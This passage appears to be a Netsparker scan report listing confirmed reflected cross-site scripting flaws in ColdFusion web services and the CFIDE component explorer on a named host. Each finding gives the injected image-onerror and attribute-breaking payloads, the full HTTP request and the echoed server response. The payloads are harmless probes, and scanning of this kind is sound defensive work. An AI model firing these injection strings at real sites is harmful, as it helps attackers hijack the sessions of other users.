<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">


<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The method '><iMg src=N onerror=netsparker(9)>' could not be found in component /var/www/html/applications/webservices/questionService.cfc.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Check to ensure that the method is defined, and that it is spelled correctly.
</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debugging Settings, and select the Robust Exception Information option.</li>

<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://hourly.deploy.com/hmc/javascript/adr_overview.js</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">23-Jul-11 12:52 PM</td>
</tr>
</table>
</td>
</tr>
</table>


</font>
</td>
</tr>
</table>
</body></html>


- /webservices/responseService.cfc

/webservices/responseService.cfc CONFIRMED

https://hourly.deploy.com/webservices/responseService.cfc?method=%3E%3CiMg%20src=N%20onerror=alert(9..

Parameters

Parameter Type Value
method GET ><iMg src=N onerror=alert(9)>
question_id GET 3

Request

GET /webservices/responseService.cfc?method=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&question_id=3 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/javascript/response.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630aaffa7c9434d5d31
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:52:59 GMT
Server: Apache/2.0.46 (Red Hat)
server-error: true
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:52:59 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">


<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The method '><iMg src=N onerror=netsparker(9)>' could not be found in component /var/www/html/applications/webservices/responseService.cfc.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Check to ensure that the method is defined, and that it is spelled correctly.
</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debugging Settings, and select the Robust Exception Information option.</li>

<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://hourly.deploy.com/hmc/javascript/response.js</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">23-Jul-11 12:52 PM</td>
</tr>
</table>
</td>
</tr>
</table>


</font>
</td>
</tr>
</table>
</body></html>


- /webservices/localeService.cfc

/webservices/localeService.cfc CONFIRMED

https://hourly.deploy.com/webservices/localeService.cfc?method=%3E%3CiMg%20src=N%20onerror=alert(9)%..

Parameters

Parameter Type Value
method GET ><iMg src=N onerror=alert(9)>
questionID GET 3

Request

GET /webservices/localeService.cfc?method=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&questionID=3 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/javascript/locale.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630aaffa7c9434d5d31
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:53:24 GMT
Server: Apache/2.0.46 (Red Hat)
server-error: true
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:53:24 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">


<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The method '><iMg src=N onerror=netsparker(9)>' could not be found in component /var/www/html/applications/webservices/localeService.cfc.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Check to ensure that the method is defined, and that it is spelled correctly.
</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debugging Settings, and select the Robust Exception Information option.</li>

<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://hourly.deploy.com/hmc/javascript/locale.js</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">23-Jul-11 12:53 PM</td>
</tr>
</table>
</td>
</tr>
</table>


</font>
</td>
</tr>
</table>
</body></html>


- /CFIDE/componentutils/cfcexplorer.cfc/%22ns=%22alert(0x000ABD)

/CFIDE/componentutils/cfcexplorer.cfc/%22ns=%22alert(0x000ABD)

https://hourly.deploy.com/CFIDE/componentutils/cfcexplorer.cfc/%22ns=%22alert(0x000ABD)

Parameters

Parameter Type Value
method GET getcfcinhtml
name GET webservices.questionService
path GET /webservices/questionService.cfc/"ns="netsparker(0x000ABD)
URI-BASED Raw URI /"ns="alert(0x000ABD)

Request

GET /CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=webservices.questionService&path=/webservices/questionService.cfc/%22ns=%22netsparker(0x000ABD) HTTP/1.1
Referer: https://hourly.deploy.com/webservices/questionService.cfc?method=getQuestionObject&client_id=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630aaffa7c9434d5d31
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:50:23 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_componentutils=;expires=Fri, 23-Jul-2010 16:50:23 GMT;path=/,CFAUTHORIZATION_componentutils=;expires=Fri, 23-Jul-2010 16:50:23 GMT;path=/
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:50:23 GMT
Connection: close
Content-Type: text/html; charset=UTF-8



<html>
<head>
<title>Component Browser Login</title>


<style>
body, p, td {
font-family: Arial, Helvetica, sans-serif;
font-size: x-small; ! important;
}

.errorText {
color: #CC0000;
}

.successText {
color: #008800;
}

.loginWhiteText {
color: #FFFFFF;
font-weight: bold;
}

.loginInvalidText {
color: #CC0000;
font-weight: bold;
}

.loginCopyrightText {
color: #999999;
font-size: x-small;
}

a {
color: #003399;
text-decoration: none;
}

a:hover {
color: #008A00;
}

.iconLinkText {
color: #FFFFFF;
font-weight: bold;
font-size: x-small;
}

.leftMenuLinkText {
color: #6C7A83;
font-size: x-small;
}

.topMenuLinkText {
color: #000000;
font-size: x-small;
}

.menuCFAdminText {
color: #FFFFFF;
font-weight: bold;
font-size: x-small;
}

.menuHeaderText {
color: #0072AC;
font-weight: bold;
font-size: x-small;
}

.menuTD {
border-top-width: 1px;
border-right-width: 1px;
border-bottom-width: 1px;
border-left-width: 1px;
border-top-style: none;
border-right-style: none;
border-bottom-style: solid;
border-left-style: none;
border-bottom-color: #CCCCCC;
}

h1 {
color: #000000;
font-weight: bold;
font-size: x-small;
margin-top: 5px;
margin-bottom: 5px;
}

.pageHeader {
color: #0072AC;
font-weight: bold;
font-size: medium; ! important;
margin-top: 5px;
margin-bottom: 5px;
}

.cellBlueSides {
border-right-width: 1px;
border-left-width: 1px;
border-right-style: solid;
border-left-style: solid;
border-right-color: #C1D9DB;
border-left-color: #C1D9DB;
}

.cellLeftBlueSide {
border-left-width: 1px;
border-left-style: solid;
border-left-color: #D5E3E6;
}

.cellRightAndBottomBlueSide {
border-right-width: 1px;
border-right-style: solid;
border-right-color: #D5E3E6;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #D5E3E6;
}

.cell3BlueSides {
border-left-width: 1px;
border-left-style: solid;
border-left-color: #D5E3E6;
border-right-width: 1px;
border-right-style: solid;
border-right-color: #D5E3E6;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #D5E3E6;
}

.cell4BlueSides {
border-top-width: 1px;
border-top-style: solid;
border-top-color: #D5E3E6;
border-left-width: 1px;
border-left-style: solid;
border-left-color: #D5E3E6;
border-right-width: 1px;
border-right-style: solid;
border-right-color: #D5E3E6;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #D5E3E6;
}

.cell2BlueSidesAndBlueBkgd {
border-top-width: 1px;
border-top-style: solid;
border-top-color: #D5E3E6;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #D5E3E6;
background-color: #E8F0F1;
}

.cellBlueTop {
border-top-width: 1px;
border-top-style: solid;
border-top-color: #C1D9DB;
border-bottom-width: none;
border-bottom-style: none;
border-bottom-color: none;
}

.cellBlueBottom {
border-top-width: none;
border-top-style: none;
border-top-color: none;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #C1D9DB;
}

.cellBlueTopAndBottom {
border-top-width: 1px;
border-top-style: solid;
border-top-color: #C1D9DB;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #C1D9DB;
}

.cellBordersBlue {
border: 1px solid #C1D9DB;
}

.cellGrayBottom {
border-top-width: none;
border-top-style: none;
border-top-color: none;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #E2E6E7;
}

.copyright {
color: #FFFFFF;
font-size: x-small;
}

.copyrightLink {
color: #FFFFCC;
font-size: x-small;
}
/*mnimer: added for the sanbox security formatting */
.color-title {background-color:888885;color:white;background-color:7A8FA4;}
.color-header {background-color:ddddd5;}
.color-buttons {background-color:ccccc5;}
.color-border {background-color:666666;}
.color-row {background-color:fffff5;}
.color-rowalert {background-color:ffddaa;}
.buttn,.buttnText {font-size:1em;font-family: tahoma,arial,Geneva,Helvetica,sans-serif;background-color:e0e0d5;}
</style>

<meta name="Author" content="Copyright 1996-2011 Macromedia Corp. All rights reserved.">
<script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script><script type="text/javascript" src="/CFIDE/scripts/masks.js"></script><script type="text/javascript"><!-- function _CF_checkloginform(_CF_this) { //reset on submit _CF_error_exists = false; _CF_error_messages = new Array(); _CF_error_fields = new Object(); _CF_FirstErrorField = null; //form element j_password required check if( !_CF_hasValue(_CF_this['j_password'], "PASSWORD", false ) ) { _CF_onError(_CF_this, "j_password", _CF_this['j_password'].value, "Password Required"); _CF_error_exists = true; } //display error messages and return success if( _CF_error_exists ) { if( _CF_error_messages.length > 0 ) { // show alert() message _CF_onErrorAlert(_CF_error_messages); // set focus to first form error, if the field supports js focus(). if( _CF_this[_CF_FirstErrorField].type == "text" ) { _CF_this[_CF_FirstErrorField].focus(); } } return false; }else { return true; } }//--></script></head>

<!-- frame buster - code by Gordon McComb -->
<script language="JavaScript" type="text/javascript">
<!-- Hide script from older browsers

function changePage()
{
if(top != self) top.location = document.location;
}

function openWin( windowURL, windowName, windowFeatures ) {
return window.open( windowURL, windowName, windowFeatures ) ;
}
function open_on_entrance(url,name)
{
new_window = window.open(url, name, ' menubar,scrollBars,resizable,dependent,status,width=525,height=300')
}
// -->
</script>
<body bgcolor="#6C7A83"
onload="changePage();document.forms.loginform.j_password.focus();">

<form name="loginform" action="/CFIDE/componentutils/cfcexplorer.cfc?NAME=webservices.questionService&METHOD=getcfcinhtml&PATH=/webservices/questionService.cfc/"ns="netsparker(0x000ABD)" method="POST" onsubmit="return _CF_checkloginform(this)">
<br />





<table width="600" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="12"><img src="../administrator/images/cap_content_white_main_top_left.gif" width="12" height="11"></td>
<td bgcolor="#FFFFFF"><img src="../administrator/images/spacer_10_x_10.gif" width="10" height="10"></td>
<td width="12"><img src="../administrator/images/cap_content_white_main_top_right.gif" width="12" height="11"></td>
</tr>
</table>

</td>
</tr>
<tr>
<td colspan="3" bgcolor="#FFFFFF" align="center">

<img src="../administrator/images/cflogo.gif" width="116" height="127">
<br /><br /><br />
<table width="100%" cellpadding="5">
<tr>
<td bgcolor="#F0F6F6" class="cellBlueTop" align="center">

<br>
<table width="400">
<tr>
<td>
<span class="loginCopyrightText">
Version: 7</strong><br />
Copyright (c) 1995-2005 Macromedia, Inc. All rights reserved
Macromedia, the Macromedia logo, Macromedia ColdFusion and ColdFusion are
trademarks or registered trademarks of Macromedia, Inc.
</span>
</td>
</tr>
</table>
<br>

</td>
</tr>
<tr>
<td align="center" bgcolor="#008CBE" class="loginWhiteText">
<center> Enter your RDS or Admin password below </center>
</th>
</tr>
<tr>
<td align="center" bgcolor="#F0F6F6" class="cellBlueBottom">

<input name="j_password_required" type="hidden" value="Password Required">
<input name="j_password" type="password" maxlength="100" size="15" class="label" id="admin_login" />
&nbsp;

<input name="submit" type="submit" value="Login" class="buttn-fix">
</td>
</tr>


</table>

</td>
</tr>

<tr>
<td>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="12"><img src="../administrator/images/cap_content_white_main_bottom_left.gif" width="12" height="11"></td>
<td bgcolor="#FFFFFF"><img src="../administrator/images/spacer_10_x_10.gif" width="10" height="10"></td>
<td width="12"><img src="../administrator/images/cap_content_white_main_bottom_right.gif" width="12" height="11"></td>
</tr>
</table>

</td>
</tr>
</table>


</form>
</body>
</html>
- /CFIDE/componentutils/cfcexplorer.cfc/%2522ns%253D%2522netsparker%25280x000C97%2529)

/CFIDE/componentutils/cfcexplorer.cfc/%2522ns%253D%2522netsparker%25280x000C97%2529)

https://hourly.deploy.com/CFIDE/componentutils/cfcexplorer.cfc/%2522ns%253D%2522netsparker%25280x000..

Parameters

Parameter Type Value
method GET getcfcinhtml
name GET webservices.questionService
path GET /webservices/questionService.cfc/"ns="netsparker(0x000C97))
URI-BASED Raw URI /%22ns%3D%22netsparker%280x000C97%29)

Request

GET /CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=webservices.questionService&path=/webservices/questionService.cfc/%22ns=%22netsparker(0x000C97)) HTTP/1.1
Referer: https://hourly.deploy.com/webservices/questionService.cfc?method=getQuestionObject&client_id=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630aaffa7c9434d5d31
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:51:38 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_componentutils=;expires=Fri, 23-Jul-2010 16:51:38 GMT;path=/,CFAUTHORIZATION_componentutils=;expires=Fri, 23-Jul-2010 16:51:38 GMT;path=/
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:51:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8



<html>
<head>
<title>Component Browser Login</title>


<style>
body, p, td {
font-family: Arial, Helvetica, sans-serif;
font-size: x-small; ! important;
}

.errorText {
color: #CC0000;
}

.successText {
color: #008800;
}

.loginWhiteText {
color: #FFFFFF;
font-weight: bold;
}

.loginInvalidText {
color: #CC0000;
font-weight: bold;
}

.loginCopyrightText {
color: #999999;
font-size: x-small;
}

a {
color: #003399;
text-decoration: none;
}

a:hover {
color: #008A00;
}

.iconLinkText {
color: #FFFFFF;
font-weight: bold;
font-size: x-small;
}

.leftMenuLinkText {
color: #6C7A83;
font-size: x-small;
}

.topMenuLinkText {
color: #000000;
font-size: x-small;
}

.menuCFAdminText {
color: #FFFFFF;
font-weight: bold;
font-size: x-small;
}

.menuHeaderText {
color: #0072AC;
font-weight: bold;
font-size: x-small;
}

.menuTD {
border-top-width: 1px;
border-right-width: 1px;
border-bottom-width: 1px;
border-left-width: 1px;
border-top-style: none;
border-right-style: none;
border-bottom-style: solid;
border-left-style: none;
border-bottom-color: #CCCCCC;
}

h1 {
color: #000000;
font-weight: bold;
font-size: x-small;
margin-top: 5px;
margin-bottom: 5px;
}

.pageHeader {
color: #0072AC;
font-weight: bold;
font-size: medium; ! important;
margin-top: 5px;
margin-bottom: 5px;
}

.cellBlueSides {
border-right-width: 1px;
border-left-width: 1px;
border-right-style: solid;
border-left-style: solid;
border-right-color: #C1D9DB;
border-left-color: #C1D9DB;
}

.cellLeftBlueSide {
border-left-width: 1px;
border-left-style: solid;
border-left-color: #D5E3E6;
}

.cellRightAndBottomBlueSide {
border-right-width: 1px;
border-right-style: solid;
border-right-color: #D5E3E6;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #D5E3E6;
}

.cell3BlueSides {
border-left-width: 1px;
border-left-style: solid;
border-left-color: #D5E3E6;
border-right-width: 1px;
border-right-style: solid;
border-right-color: #D5E3E6;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #D5E3E6;
}

.cell4BlueSides {
border-top-width: 1px;
border-top-style: solid;
border-top-color: #D5E3E6;
border-left-width: 1px;
border-left-style: solid;
border-left-color: #D5E3E6;
border-right-width: 1px;
border-right-style: solid;
border-right-color: #D5E3E6;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #D5E3E6;
}

.cell2BlueSidesAndBlueBkgd {
border-top-width: 1px;
border-top-style: solid;
border-top-color: #D5E3E6;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #D5E3E6;
background-color: #E8F0F1;
}

.cellBlueTop {
border-top-width: 1px;
border-top-style: solid;
border-top-color: #C1D9DB;
border-bottom-width: none;
border-bottom-style: none;
border-bottom-color: none;
}

.cellBlueBottom {
border-top-width: none;
border-top-style: none;
border-top-color: none;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #C1D9DB;
}

.cellBlueTopAndBottom {
border-top-width: 1px;
border-top-style: solid;
border-top-color: #C1D9DB;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #C1D9DB;
}

.cellBordersBlue {
border: 1px solid #C1D9DB;
}

.cellGrayBottom {
border-top-width: none;
border-top-style: none;
border-top-color: none;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #E2E6E7;
}

.copyright {
color: #FFFFFF;
font-size: x-small;
}

.copyrightLink {
color: #FFFFCC;
font-size: x-small;
}
/*mnimer: added for the sanbox security formatting */
.color-title {background-color:888885;color:white;background-color:7A8FA4;}
.color-header {background-color:ddddd5;}
.color-buttons {background-color:ccccc5;}
.color-border {background-color:666666;}
.color-row {background-color:fffff5;}
.color-rowalert {background-color:ffddaa;}
.buttn,.buttnText {font-size:1em;font-family: tahoma,arial,Geneva,Helvetica,sans-serif;background-color:e0e0d5;}
</style>

<meta name="Author" content="Copyright 1996-2011 Macromedia Corp. All rights reserved.">
<script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script><script type="text/javascript" src="/CFIDE/scripts/masks.js"></script><script type="text/javascript"><!-- function _CF_checkloginform(_CF_this) { //reset on submit _CF_error_exists = false; _CF_error_messages = new Array(); _CF_error_fields = new Object(); _CF_FirstErrorField = null; //form element j_password required check if( !_CF_hasValue(_CF_this['j_password'], "PASSWORD", false ) ) { _CF_onError(_CF_this, "j_password", _CF_this['j_password'].value, "Password Required"); _CF_error_exists = true; } //display error messages and return success if( _CF_error_exists ) { if( _CF_error_messages.length > 0 ) { // show alert() message _CF_onErrorAlert(_CF_error_messages); // set focus to first form error, if the field supports js focus(). if( _CF_this[_CF_FirstErrorField].type == "text" ) { _CF_this[_CF_FirstErrorField].focus(); } } return false; }else { return true; } }//--></script></head>

<!-- frame buster - code by Gordon McComb -->
<script language="JavaScript" type="text/javascript">
<!-- Hide script from older browsers

function changePage()
{
if(top != self) top.location = document.location;
}

function openWin( windowURL, windowName, windowFeatures ) {
return window.open( windowURL, windowName, windowFeatures ) ;
}
function open_on_entrance(url,name)
{
new_window = window.open(url, name, ' menubar,scrollBars,resizable,dependent,status,width=525,height=300')
}
// -->
</script>
<body bgcolor="#6C7A83"
onload="changePage();document.forms.loginform.j_password.focus();">

<form name="loginform" action="/CFIDE/componentutils/cfcexplorer.cfc?NAME=webservices.questionService&PATH=/webservices/questionService.cfc/"ns="netsparker(0x000C97))&METHOD=getcfcinhtml" method="POST" onsubmit="return _CF_checkloginform(this)">
<br />





<table width="600" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="12"><img src="../administrator/images/cap_content_white_main_top_left.gif" width="12" height="11"></td>
<td bgcolor="#FFFFFF"><img src="../administrator/images/spacer_10_x_10.gif" width="10" height="10"></td>
<td width="12"><img src="../administrator/images/cap_content_white_main_top_right.gif" width="12" height="11"></td>
</tr>
</table>

</td>
</tr>
<tr>
<td colspan="3" bgcolor="#FFFFFF" align="center">

<img src="../administrator/images/cflogo.gif" width="116" height="127">
<br /><br /><br />
<table width="100%" cellpadding="5">
<tr>
<td bgcolor="#F0F6F6" class="cellBlueTop" align="center">

<br>
<table width="400">
<tr>
<td>
<span class="loginCopyrightText">
Version: 7</strong><br />
Copyright (c) 1995-2005 Macromedia, Inc. All rights reserved
Macromedia, the Macromedia logo, Macromedia ColdFusion and ColdFusion are
trademarks or registered trademarks of Macromedia, Inc.
</span>
</td>
</tr>
</table>
<br>

</td>
</tr>
<tr>
<td align="center" bgcolor="#008CBE" class="loginWhiteText">
<center> Enter your RDS or Admin password below </center>
</th>
</tr>
<tr>
<td align="center" bgcolor="#F0F6F6" class="cellBlueBottom">

<input name="j_password_required" type="hidden" value="Password Required">
<input name="j_password" type="password" maxlength="100" size="15" class="label" id="admin_login" />
&nbsp;

<input name="submit" type="submit" value="Login" class="buttn-fix">
</td>
</tr>


</table>

</td>
</tr>

<tr>
<td>

